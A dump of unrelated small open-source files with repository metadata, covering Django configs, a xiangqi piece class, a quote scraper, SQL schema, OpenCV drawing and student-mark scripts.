mensagem="impar"
print(mensagem) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
ae09bb1661be801f7980a94afbbefdc6ad13a5f0 | 995377be6b76ba82972a8d6a06723ff534a11704 | /mysite/urls.py | fba60b92ee343dae4317be3d364e35117125c3e2 | [
"MIT"
] | permissive | ChechonsOrganization/mysite-django3byexample | 8a5bdd0e31625bc2aee167901f1f5e10453c9894 | f8c0a341df30599c35d52e5205242b0e5906150c | refs/heads/master | 2023-03-21T15:27:32.042118 | 2021-03-10T13:35:45 | 2021-03-10T13:35:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Add the blog sitemap
from django.contrib.sitemaps.views import sitemap
from blog.sitemaps import PostSitemap
# Sitemaps registry: section name -> Sitemap class
sitemaps = {
    'posts': PostSitemap
}
urlpatterns = [
    path('admin/', admin.site.urls),
    # Include the blog application's URL patterns in the project
    path('blog/', include('blog.urls', namespace='blog')),
    # Include the sitemap view, fed with the registry above
    path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap')
]
| [
"sergio.04.ramirez@gmail.com"
] | sergio.04.ramirez@gmail.com |
34b224ca169154804d42c83f0596df550b7665ef | 96e9da624caaa4d93fe6c8807bf8876c9e38729b | /agents/utils/parsing.py | 76018c275957536f0fca77ffae100dd39c40ee9e | [] | no_license | APodolskiy/TextWorld_Challenge | 89c3da5b8601795ec3c733c1dcc4bdc9c1c9f6ba | 74a6de102edb697304b5f5ecb47115d187171c10 | refs/heads/master | 2020-04-22T23:27:34.622316 | 2019-07-11T07:36:30 | 2019-07-11T07:36:30 | 170,742,519 | 1 | 0 | null | 2019-07-11T07:36:31 | 2019-02-14T18:59:54 | Python | UTF-8 | Python | false | false | 1,949 | py | from pathlib import Path
from pprint import pprint
from random import shuffle
from typing import List
import gym
import textworld.gym
def parse_recipe(recipe: str):
    """Split a TextWorld recipe text into its two sections.

    Returns (ingredients, directions): each is the stripped lines following
    the "Ingredients:" / "Directions:" headers, with "eat meal" appended as
    the final direction.
    """
    directions_at = recipe.find("Directions:")
    ingredients_at = recipe.find("Ingredients:")
    steps = []
    for line in recipe[directions_at:].split("\n")[1:]:
        if line:
            steps.append(line.strip())
    steps.append("eat meal")
    items = []
    for line in recipe[ingredients_at:directions_at].split("\n")[1:]:
        if line:
            items.append(line.strip())
    return items, steps
def parse_inventory(inventory: str):
    """Parse a TextWorld inventory string into a list of carried items.

    Everything after "You are carrying" is inspected; a leading ':' means a
    non-empty item list follows, one item per line. Returns [] otherwise.
    """
    carried = inventory.split("You are carrying")[1].strip()
    if not carried.startswith(":"):
        return []
    items = []
    for entry in carried[2:].split("\n"):
        items.append(entry.strip())
    return items
def get_missing_ingredients_from_inventory(available_items: List, recipe_items: List):
    """Return the recipe items not covered by any carried item.

    A recipe item counts as present when some entry in *available_items*
    ends with it (e.g. "a red onion" covers "onion").
    """
    missing = []
    for needed in recipe_items:
        carried = any(held.endswith(needed) for held in available_items)
        if not carried:
            missing.append(needed)
    return missing
if __name__ == "__main__":
from agents.DRQN.custom_agent import BaseQlearningAgent
# gamefile = "games/train_sample/tw-cooking-recipe1+cut+drop+go9-oW8msba8TGYoC6Pl.ulx"
game_dir = Path("games/train")
game_files = [str(d) for d in game_dir.iterdir() if d.name.endswith("ulx")]
shuffle(game_files)
game_files = game_files[:40]
env_id = textworld.gym.register_games(
game_files,
BaseQlearningAgent.select_additional_infos(),
max_episode_steps=100,
name="training_par",
)
env = gym.make(env_id)
for game in game_files:
obs, infos = env.reset()
recipe = infos["extra.recipe"]
inventory = infos["inventory"]
print(env.env.current_gamefile)
print(infos["extra.walkthrough"])
pprint(parse_recipe(recipe)[0])
parsed_inventory = parse_inventory(inventory)
print(parsed_inventory)
print("MISSING:", get_missing_ingredients_from_inventory(inventory, recipe))
print("#" * 60)
| [
"dimich3d@ya.ru"
] | dimich3d@ya.ru |
78cd02f35eb33e0dca1c10049960dc96d060c161 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part006597.py | f32e3be699fb19351abe7424a78bedb56216f820 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher125926(CommutativeMatcher):
    """Appears to be auto-generated (sympy RUBI) many-to-one matcher for a
    commutative Mul pattern; not intended for hand editing."""
    _instance = None
    # Single pattern: two variable slots under Mul, the second optional
    # with default S(1).
    patterns = {
        0: (0, Multiset({}), [
            (VariableWithCount('i2.2.3.1.0', 1, 1, None), Mul),
            (VariableWithCount('i2.2.3.1.0_1', 1, 1, S(1)), Mul)
        ])
    }
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    associative = Mul
    max_optional_count = 1
    anonymous_patterns = set()
    def __init__(self):
        self.add_subject(None)
    @staticmethod
    def get():
        # Lazily-created singleton instance.
        if CommutativeMatcher125926._instance is None:
            CommutativeMatcher125926._instance = CommutativeMatcher125926()
        return CommutativeMatcher125926._instance
    @staticmethod
    def get_match_iter(subject):
        # Generator that yields no matches: the unreachable `yield` after
        # `return` is what turns this function into a generator.
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 125925
        return
        yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
9b2b62d6c9e2308e570b19de28085ae1f34c35a9 | 7bcb0b7f721c8fa31da7574f13ed0056127715b3 | /src/apps/api/resources/subscription.py | 62e5a4c74c86c9613ca6bd0c1ba0aeca5007fa3d | [] | no_license | simonchapman1986/ripe | 09eb9452ea16730c105c452eefb6a6791c1b4a69 | c129da2249b5f75015f528e4056e9a2957b7d884 | refs/heads/master | 2022-07-22T05:15:38.485619 | 2016-01-15T12:53:43 | 2016-01-15T12:53:43 | 49,718,671 | 1 | 0 | null | 2022-07-07T22:50:50 | 2016-01-15T12:53:09 | Python | UTF-8 | Python | false | false | 455 | py | from apps.base.models import FactServicesStorefrontSubscription
from tastypie.resources import ModelResource
class SubscriptionResource(ModelResource):
    """Read-only tastypie resource over storefront subscription facts.

    Exposed under resource name 'entry'; only GET is allowed for both list
    and detail, and results can be filtered on event_time
    (exact/range/gt/gte/lt/lte).
    """
    class Meta:
        queryset = FactServicesStorefrontSubscription.objects.all()
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'entry'
        filtering = {
            'event_time': ['exact', 'range', 'gt', 'gte', 'lt', 'lte'],
        }
"simon-ch@moving-picture.com"
] | simon-ch@moving-picture.com |
105f39188ea14f446671389556da928dc7a2a49f | d5fb21eec872bde734b967f31ae822a22316ce8b | /samplesite/bboard/migrations/0001_initial.py | 314b155cf0ee449eb546856667590acfcab560d0 | [] | no_license | isys35/lessons_django3_dronov | 27cea948ce0d4af1ff8fa3a2ba09b1f4b6b6e04c | c14f68854968b36bae3584172b9479f44c519306 | refs/heads/master | 2023-06-11T03:17:30.877993 | 2021-07-02T11:45:10 | 2021-07-02T11:45:10 | 317,238,079 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | # Generated by Django 3.1.3 on 2020-11-30 13:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Bb table with a title,
    optional content/price, and an indexed auto-set publish timestamp."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Bb',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=50)),
                ('content', models.TextField(blank=True, null=True)),
                ('price', models.FloatField(blank=True, null=True)),
                ('published', models.DateTimeField(auto_now_add=True, db_index=True)),
            ],
        ),
    ]
| [
"isys35@mail.ru"
] | isys35@mail.ru |
7cad58a9f69a867abfe4d091be275e040d48a0d4 | d44c05216e554e0d0b279fd6d7e6bcfe4755c399 | /pieces/bing.py | f1f67c4eae56d7f2a037325cfcff38965780b8e7 | [
"MIT"
] | permissive | east-before-dawn/Check-Chess-Cheer | bef5c53dc0e5b88c96c5fcfde9fba55cfef773fd | 6c7562d1358bf12946693221b5414d9fbb676841 | refs/heads/main | 2023-06-09T17:10:02.293679 | 2021-06-15T11:08:47 | 2021-06-15T11:08:47 | 401,147,724 | 1 | 1 | MIT | 2021-08-29T21:41:08 | 2021-08-29T21:41:08 | null | UTF-8 | Python | false | false | 1,446 | py | from NormalPiece import NormalPiece
class Bing(NormalPiece):
    """Bing (soldier/pawn) piece for Chinese chess (xiangqi)."""
    def __init__(self, x, y, color):
        NormalPiece.__init__(self, x, y, color)
    """
    找该棋子的图片路径
    """
    def get_image_path(self):
        """Return the sprite path for this piece's color and selection state."""
        if self.selected == True:
            if self.color == 'red':
                return "images/Rbing_S.gif"
            else:
                return "images/Bbing_S.gif"
        else:
            if self.color == 'red':
                return "images/Rbing.gif"
            else:
                return "images/Bbing.gif"
    """
    判断该逻辑位置(prex,prey)能不能落子
    """
    def can_move(self, prex, prey, chessboard):
        """Return True if this soldier may legally move to cell (prex, prey)."""
        x, y = self.x, self.y
        dx, dy = prex - self.x, prey - self.y
        # Off the board (files 0-8, ranks 0-9)
        if prex < 0 or prex > 8 or prey < 0 or prey > 9:
            return False
        # Destination occupied by a friendly piece
        if (prex, prey) in chessboard.all_pieces and chessboard.all_pieces[prex, prey].color == self.color:
            return False
        # May move exactly one step only
        if abs(dx) + abs(dy) != 1:
            return False
        # May not move backwards
        if (self.is_north() and dy == -1) or (self.is_south() and dy == 1):
            return False
        # Sideways movement only after crossing the river; before that,
        # only straight ahead
        if dy == 0:
            if (self.is_north() and y < 5) or (self.is_south() and y > 4):
                return False
        return True
| [
"389041637@qq.com"
] | 389041637@qq.com |
b42508610856a9da00e6b77138872e63aab1b223 | 50f04c633f36e9d64c40c4f1b434ed0c24e447c7 | /argparse-examples/positionalarg.py | 047332844d22ec1332227b4bb8bc6c545fec0f22 | [] | no_license | sarahchou/python-practice | 883ba7dedd60b2cc18d5d73ef7d3cbb74f09dede | 2a3d10144b74460d8ec513e3c7d49bdb48107596 | refs/heads/master | 2022-11-11T10:06:12.944579 | 2018-06-11T22:14:06 | 2018-06-11T22:14:06 | 136,985,077 | 0 | 1 | null | 2022-10-20T08:48:36 | 2018-06-11T21:54:46 | Python | UTF-8 | Python | false | false | 305 | py | #Introduction to positional arguments
# NOTE: Python 2 syntax (`print` statement); run with a python2 interpreter.
import argparse
parser = argparse.ArgumentParser()
# parser.add_argument("echo", help="echo the string you use here")
# "square" is a required positional argument, converted to int by argparse.
parser.add_argument("square", help="display a square of a given number", type=int)
args = parser.parse_args()
# print args.echo
print args.square**2
| [
"chou.s@husky.neu.edu"
] | chou.s@husky.neu.edu |
08e5f8478bb5c283fa2e2c074c5942fd8ce543c0 | 35d094f33d0c2f840298b6a38113701f7c22e92a | /load/bin/record-index-quotes.py | c7a4073f454d0e05df2c0a984620dd2ddb0f32ec | [] | no_license | sqt-aliu/etl | e40e0879f820d5523b408c9aed4ff2b1944cfe3e | 63e0c5dda81e1a849b10c724661c8cfa6b7f832f | refs/heads/master | 2020-04-05T13:39:42.120815 | 2017-11-07T01:59:22 | 2017-11-07T01:59:22 | 94,945,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,144 | py | #!/opt/anaconda3/bin/python -u
import getopt
import os
import pandas as pd
import sys
from sqlalchemy import create_engine, exc
from datetime import datetime, date, timedelta
from dateutil.relativedelta import relativedelta
from urllib.parse import urlencode
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
from time import sleep
from xml.dom import minidom
sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '../..'))
from common.lib.log import debug, error, fatal, info, warn
from extract.lib.google import GoogleHistorical
def read_config(config):
    """Parse *config* (XML) and return a {key: value} dict built from the
    'key'/'value' attributes of every <index> element."""
    info("Reading file " + config)
    document = minidom.parse(config)
    index_nodes = document.getElementsByTagName('index')
    return {node.getAttribute('key'): node.getAttribute('value') for node in index_nodes}
def download_quotes(ticker, start=None, end=None, iteration=1, max_tries=2):
    """Fetch historical quote rows for *ticker* from Google Finance.

    *start*/*end* are optional date strings passed through verbatim as the
    startdate/enddate query parameters. On any request failure the call is
    retried recursively up to *max_tries* additional attempts.

    Returns the parsed quote dict (GoogleHistorical.data); empty on total
    failure.

    BUGFIX: the retry branches previously called download_quotes() but
    discarded its return value, so after any error this function always
    returned {} even when the retry succeeded. The retry's result is now
    returned to the caller.
    """
    url = 'https://www.google.com/finance/historical'
    quotes = {}
    params = {}
    params['q'] = ticker
    params['num'] = 200
    if start is not None:
        params['startdate'] = start
    if end is not None:
        params['enddate'] = end
    try:
        urlparams = urlencode(params)
        url = url + '?' + urlparams
        info("Requesting url [%s]" % (url))
        urlResp = urlopen(url, timeout=30)
        html = urlResp.read().decode('utf-8')
        urlResp.close()
        # instantiate the parser and feed it the downloaded HTML
        htmlparser = GoogleHistorical()
        htmlparser.feed(html)
        quotes.update(htmlparser.data)
    # handle errors; order matters: HTTPError < URLError < OSError
    except HTTPError as e:
        error("HTTP Error: %s, url=%s, attempt=%i" % (str(e.code), url, iteration))
        if iteration <= max_tries:
            return download_quotes(ticker, start, end, iteration=iteration+1)
    except URLError as e:
        error("URL Error: %s, url=%s, attempt=%i" % (e.reason, url, iteration))
        if iteration <= max_tries:
            return download_quotes(ticker, start, end, iteration=iteration+1)
    except OSError as e:
        error("OS Error: %s, url=%s, attempt=%i" % (e, url, iteration))
        if iteration <= max_tries:
            return download_quotes(ticker, start, end, iteration=iteration+1)
    except:
        # Catch-all for non-OSError failures (e.g. decode errors).
        error("Unknown Error: %s, url=%s, attempt=%i" % (sys.exc_info()[0], url, iteration))
        if iteration <= max_tries:
            return download_quotes(ticker, start, end, iteration=iteration+1)
    return quotes
def insert_quotes(ticker, dbconn, quotes):
    """Insert *quotes* ({date: {'OP','HI','LO','CL'}}) for *ticker* into the
    `prices` table, skipping dates already present.

    NOTE(review): SQL is built by string interpolation; fine for trusted
    local config-driven tickers, but consider parameterized queries.
    """
    if len(quotes) > 0:
        try:
            info("Creating MariaDB Engine...")
            db = create_engine(dbconn, echo=False)
            conn = db.connect()
            # Load existing rows once so each quote date is a cheap lookup.
            sql = "Select * From prices Where ticker = '%s'" % (ticker)
            info("Executing query [%s]" % (sql))
            df = pd.read_sql_query(sql, conn, index_col='date')
            for quote_date, quote_vals in sorted(quotes.items()):
                if quote_date.date() in df.index:
                    info("Record already exists [%s][%s]...skipping" % (ticker, quote_date))
                else:
                    try:
                        # Trailing 'G' marks the source as Google.
                        sql = "INSERT INTO prices VALUES ('%s','%s',%s,%s,%s,%s,'G')" % (ticker, datetime.strftime(quote_date, '%Y-%m-%d'), quote_vals['OP'], quote_vals['HI'], quote_vals['LO'], quote_vals['CL'])
                        info("Executing query [%s]" % (sql))
                        db.execute(sql)
                    except exc.IntegrityError as e:
                        error("DB Integrity Error: %s, sql=%s" % (e, sql))
                    except exc.SQLAlchemyError as e:
                        error("DB SQLAlchemy Error: %s, sql=%s" % (e, sql))
            conn.close()
        except exc.SQLAlchemyError as e:
            error("Database Error: %s, conn=%s" % (e, dbconn))
        except:
            error("Unknown Error: %s, conn=%s" % (sys.exc_info()[0], dbconn))
    else:
        warn("No quotes found for ticker %s" % (ticker))
def record_quotes(config, dbconn, batch=False):
    """Download and store quotes for every index in the config file.

    With batch=True, history is pulled in 4-month windows starting at
    1999-01-01 until today, sleeping 5s between requests to throttle;
    otherwise a single (recent) download is made per index.
    """
    index_map = read_config(config)
    for k,v in sorted(index_map.items()):
        if batch:
            current_date = datetime.strptime('1999-01-01', '%Y-%m-%d')
            while True:
                # Window is [current_date, current_date + 4 months - 1 day].
                end_date = (current_date + relativedelta(months=4)) - timedelta(days=1)
                start = current_date.strftime("%b %d, %Y")
                end = end_date.strftime("%b %d, %Y")
                insert_quotes(k, dbconn, download_quotes(v, start, end))
                if end_date > datetime.today():
                    break
                current_date = end_date + timedelta(days=1)
                sleep(5)
        else:
            insert_quotes(k, dbconn, download_quotes(v))
def print_usage():
    """Print the command-line usage summary to stdout."""
    usage_lines = [
        " Usage: %s [options]" % (os.path.basename(__file__)),
        " Options:",
        " \t-c, --config\tconfiguration file",
        " \t-d, --database\tdatabase connection string",
        " \t-b, --batch\tbatch mode",
        " \t-h,\t\thelp",
    ]
    for usage_line in usage_lines:
        print(usage_line)
def main(argv):
    """Parse CLI options (-c/--config, -d/--database, -b/--batch, -h) and
    kick off record_quotes(); exits with usage on bad/missing arguments."""
    argCfg = ""
    argDBConn = ""
    optBatch = False
    try:
        opts, args = getopt.getopt(argv,"hbc:d:",["batch","config=","database="])
    except getopt.GetoptError:
        print_usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print_usage()
            sys.exit()
        elif opt in ("-c", "--config"):
            argCfg = arg
        elif opt in ("-d", "--database"):
            argDBConn = arg
        elif opt in ("-b", "--batch"):
            optBatch = True
    # Both the config file and the DB connection string are mandatory.
    if len(argDBConn) == 0 or len(argCfg) == 0:
        print_usage()
        sys.exit(0)
    if not os.path.exists(argCfg):
        fatal("File %s not found" % (argCfg))
    record_quotes(argCfg, argDBConn, optBatch)
if __name__ == '__main__':
    main(sys.argv[1:])
"allenliu@htsc.com"
] | allenliu@htsc.com |
142149509d7a5bb8e78ae7e37ec76a01b767a1bf | bfb1ebb52db5018f328e4b33003073d547b777d0 | /sql_queries.py | 347cd9e0aa01f2f81321b9bc2fb323d0ecc42817 | [] | no_license | mrpythonita/Data-Modelling-with-Postgres | 96ab888bfdca8a0879187d01bf8145993ccef117 | e4c562fd7239141a01aeefdd1eed9792efc58c74 | refs/heads/main | 2023-02-23T11:51:11.128289 | 2021-01-26T21:01:25 | 2021-01-26T21:01:25 | 333,214,021 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,808 | py | # DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays"
user_table_drop = "DROP TABLE IF EXISTS users"
song_table_drop = "DROP TABLE IF EXISTS songs"
artist_table_drop = "DROP TABLE IF EXISTS artists"
time_table_drop = "DROP TABLE IF EXISTS time"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE songplays(
songplay_id serial PRIMARY KEY
,start_time timestamp NOT NULL
,user_id varchar(50) NOT NULL
,level varchar(100)
,song_id varchar(50)
,artist_id varchar(50)
,session_id int
,location varchar
,user_agent varchar
)
""")
user_table_create = ("""
CREATE TABLE users(
user_id varchar(50) PRIMARY KEY
,first_name varchar(50)
,last_name varchar(50)
,gender varchar(10)
,level varchar(50)
)
""")
song_table_create = ("""
CREATE TABLE songs(
song_id varchar PRIMARY KEY
,title varchar
,artist_id varchar
,year int
,duration float
)
""")
artist_table_create = ("""
CREATE TABLE artists(
artist_id varchar PRIMARY KEY
,artist_name varchar
,artist_location varchar
,artist_latitude float
,artist_longitude float
)
""")
time_table_create = ("""
CREATE TABLE time(
start_time timestamp PRIMARY KEY
,hour int
,day int
,week int
,month int
,year int
,weekday int
)
""")
# INSERT RECORDS
songplay_table_insert = ("""
INSERT INTO songplays(
start_time
,user_id
,level
,song_id
,artist_id
,session_id
,location
,user_agent
)
VALUES (%s,%s,%s,%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
user_table_insert = ("""
INSERT INTO users(
user_id
,first_name
,last_name
,gender
,level
)
VALUES(%s,%s,%s,%s,%s)
on conflict(user_id) DO UPDATE SET level= excluded.level
""")
song_table_insert = ("""
INSERT INTO songs(
song_id
,title
,artist_id
,year
,duration
)
VALUES(%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
artist_table_insert = ("""
INSERT INTO artists(
artist_id
,artist_name
,artist_location
,artist_latitude
,artist_longitude
)
VALUES(%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
time_table_insert = ("""
INSERT INTO time(
start_time
,hour
,day
,week
,month
,year
,weekday
)
VALUES(%s,%s,%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
# FIND SONGS
song_select = ("""
SELECT s.song_id
,s.artist_id
FROM songs s
JOIN artists a
ON s.artist_id = a.artist_id
WHERE s.title = %s
AND a.artist_name = %s
AND s.duration = %s
""")
# QUERY LISTS
# Run in list order — presumably consumed by the companion create/drop
# scripts; verify against their callers.
create_table_queries = [songplay_table_create, user_table_create, song_table_create, artist_table_create, time_table_create]
drop_table_queries = [songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop]
"noreply@github.com"
] | mrpythonita.noreply@github.com |
fe75ca185adaf37639a4e3782095a41d9b93f1ab | f5eba932cba302389943cc1beed77352ce484b73 | /isolate_by_range/isolate_atoms_by_z_range_atom_numbers.py | c9e30d883f995fbdd0cf3738b5637c056cf575db | [] | no_license | mikexstudios/wagcode | 06c74332e8cad42e6b04bac121fd86f7d75a9e2d | 3e925052f17a9c9cf256d3e1ab985265d39e13ff | refs/heads/master | 2020-12-24T15:41:07.849300 | 2009-07-22T10:24:23 | 2009-07-22T10:24:23 | 246,507 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | #!/usr/bin/env python
'''
isolate_atoms_by_z_range_atom_numbers.py
------------------------
Given an XYZ file and a z range, isolates those atoms.
This version adds the output of atom numbers. Used these numbers
to get charges from fort.56 file.
'''
__author__ = 'Michael Huynh (mikeh@caltech.edu)'
__website__ = 'http://www.mikexstudios.com'
__copyright__ = 'General Public License (GPL)'
#import sys
#import re
#import math
from XYZ import *
#Parameters
structure_file = 'test.xyz'
output_file = 'test_atom_numbers.txt'
surface_z_min = 31.0 #Defines the starting z coordinates for the surface
surface_z_max = 33.0 #Defiles the ending z coordinates for the surface
def get_atom_numbers_by_z_range(xyz_rows, z_min, z_max):
    """Return the 1-based atom numbers whose z coordinate lies in [z_min, z_max].

    Each XYZ row has the layout [atom, x, y, z]; atom numbering starts at 1,
    hence the +1 on the enumerate index.
    """
    return [index + 1
            for index, row in enumerate(xyz_rows)
            if z_min <= row[3] <= z_max]
def main():
    """Load the structure, select atoms in the configured z range, and write
    their 1-based atom numbers to output_file, one per line."""
    structure = XYZ()
    structure.load(structure_file)
    atom_numbers = get_atom_numbers_by_z_range(
        structure.rows, surface_z_min, surface_z_max
    )
    # 'with open(...)' guarantees the handle is closed even on error; the
    # original used the Python 2-only file() builtin plus a manual close().
    with open(output_file, 'w') as f:
        for atom_number in atom_numbers:
            f.write(str(atom_number) + "\n")
if __name__ == '__main__':
main()
| [
"mike.huynh@gmail.com"
] | mike.huynh@gmail.com |
b246bc922d4bf8d4371629aadf578c161d4a5220 | b5a214062f140389527479802d98d414d8e41dc6 | /bindings/python/tests/cindex/test_comment.py | d8f3129ac51e7f5643327d177424ac5d821fbf7c | [
"NCSA"
] | permissive | Codeon-GmbH/mulle-clang | f050d6d8fb64689a1e4b039c4a6513823de9b430 | 2f6104867287dececb46e8d93dd9246aad47c282 | refs/heads/master | 2021-07-18T07:45:29.083064 | 2016-11-01T13:16:44 | 2016-11-01T13:16:44 | 72,544,381 | 29 | 5 | Apache-2.0 | 2020-04-30T11:36:08 | 2016-11-01T14:32:02 | C++ | UTF-8 | Python | false | false | 957 | py | from clang.cindex import TranslationUnit
from tests.cindex.util import get_cursor
def test_comment():
    """Cursors expose raw/brief doc-comments when the TU is parsed comment-aware."""
    fake_source = """
/// Aaa.
int test1;
/// Bbb.
/// x
void test2(void);
void f() {
}
"""
    # Build a translation unit with brief-comment parsing enabled.
    unit = TranslationUnit.from_source(
        'fake.c', ['-std=c99'],
        unsaved_files=[('fake.c', fake_source)],
        options=TranslationUnit.PARSE_INCLUDE_BRIEF_COMMENTS_IN_CODE_COMPLETION)

    decl = get_cursor(unit, 'test1')
    assert decl is not None, "Could not find test1."
    assert decl.type.is_pod()
    assert decl.raw_comment == "/// Aaa."
    assert decl.brief_comment == "Aaa."

    decl = get_cursor(unit, 'test2')
    assert decl.raw_comment == "/// Bbb.\n/// x"
    assert decl.brief_comment == "Bbb. x"

    # f has no documentation comment at all.
    decl = get_cursor(unit, 'f')
    assert decl.raw_comment is None
    assert decl.brief_comment is None
| [
"akyrtzi@gmail.com"
] | akyrtzi@gmail.com |
ee135d519ec0726e6868d0dedee7b7549765574d | 95e475d1d8141c0ed59225d9dbb08f066e018545 | /OpenCV/DrawingShapes.py | 488edecafaec533fe61892f7bd1be144815ee0ea | [] | no_license | kk13332488/Deep-Learning | 296a81888a17e6b7ffe96d72e965a04d17c70967 | c72d6453483dba0bdd591a499e6009dcd3f81139 | refs/heads/main | 2023-05-31T10:48:08.663865 | 2021-07-02T05:17:33 | 2021-07-02T05:17:33 | 362,121,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | import numpy as np
import cv2
def drawing():
    """Draw a handful of primitives on a black canvas and show the result."""
    canvas = np.zeros((512, 512, 3), np.uint8)
    blue = (255, 0, 0)
    green = (0, 255, 0)
    red = (0, 0, 255)
    white = (255, 255, 255)
    # Diagonal line across the whole canvas (thickness 4).
    cv2.line(canvas, (0, 0), (511, 511), blue, 4)
    # Hollow rectangle in the top-right corner.
    cv2.rectangle(canvas, (384, 0), (510, 128), green, 3)
    # Filled circle (thickness -1 fills it); drawn after -- and over -- the rectangle.
    cv2.circle(canvas, (447, 63), 63, red, -1)
    # Filled half ellipse (arc from 0 to 180 degrees).
    cv2.ellipse(canvas, (256, 256), (100, 50), 0, 0, 180, blue, -1)
    cv2.putText(canvas, 'openCV', (10, 500), cv2.FONT_HERSHEY_SIMPLEX, 4, white, 2)
    cv2.imshow('drawing', canvas)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
drawing()
| [
"kk13332488@gmail.com"
] | kk13332488@gmail.com |
afe6fbf10498b11d0c161994d33a51a850a6036e | 1fa3016c1b67178910b477fd5885cc0fff17e923 | /Learning Python/2D Array.py | 000cb06dc25ee81a85c884fc6a4a04e61e55c5d2 | [] | no_license | Charnub/python-code | 9f1c952075ed725b8561a2115acb30872ba0b797 | 3e35510756e8635e26fc3b71396a0c8856385b69 | refs/heads/master | 2021-04-15T09:26:34.691921 | 2018-03-22T18:09:51 | 2018-03-22T18:09:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | import random
aScores = [["Jane", 0], ["Bob", 10], ["Ben", 14]]
for i in range (0,1):
for j in range (0,2):
print(aScores[i][j])
| [
"noreply@github.com"
] | Charnub.noreply@github.com |
75bbbe754d344cb243580cb495baebe07914d27a | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_9/alhada001/question1.py | a7d1ab9e4c2362dd2297a16531f5457babdf6f3d | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | #Adam Alhadeff
import math
file = input("Enter the marks filename:\n")
f = open(file, "r")
length = len(open(file).readlines())
names = []
marks = []
line = f.readline()
count = 0
for i in range(length):
split = line.split(",")
names.append(split[0])
marks.append(split[1])
count += 1
line = f.readline()
total = 0
for i in range(len(marks)):
total = total + int(marks[i])
average = total/count
SDT = 0
for i in range(len(marks)):
SDT = SDT + (int(marks[i])-average)*(int(marks[i])-average)
SD = math.sqrt(SDT/count)
print("The average is:","%0.2f" % (average))
print("The std deviation is:","%0.2f" % (SD))
NumStudents = 0
for i in range(len(marks)):
if int(marks[i]) < (average-SD):
NumStudents += 1
if NumStudents != 0:
print("List of students who need to see an advisor:")
for i in range(len(marks)):
if int(marks[i]) < (average-SD):
print(names[i]) | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
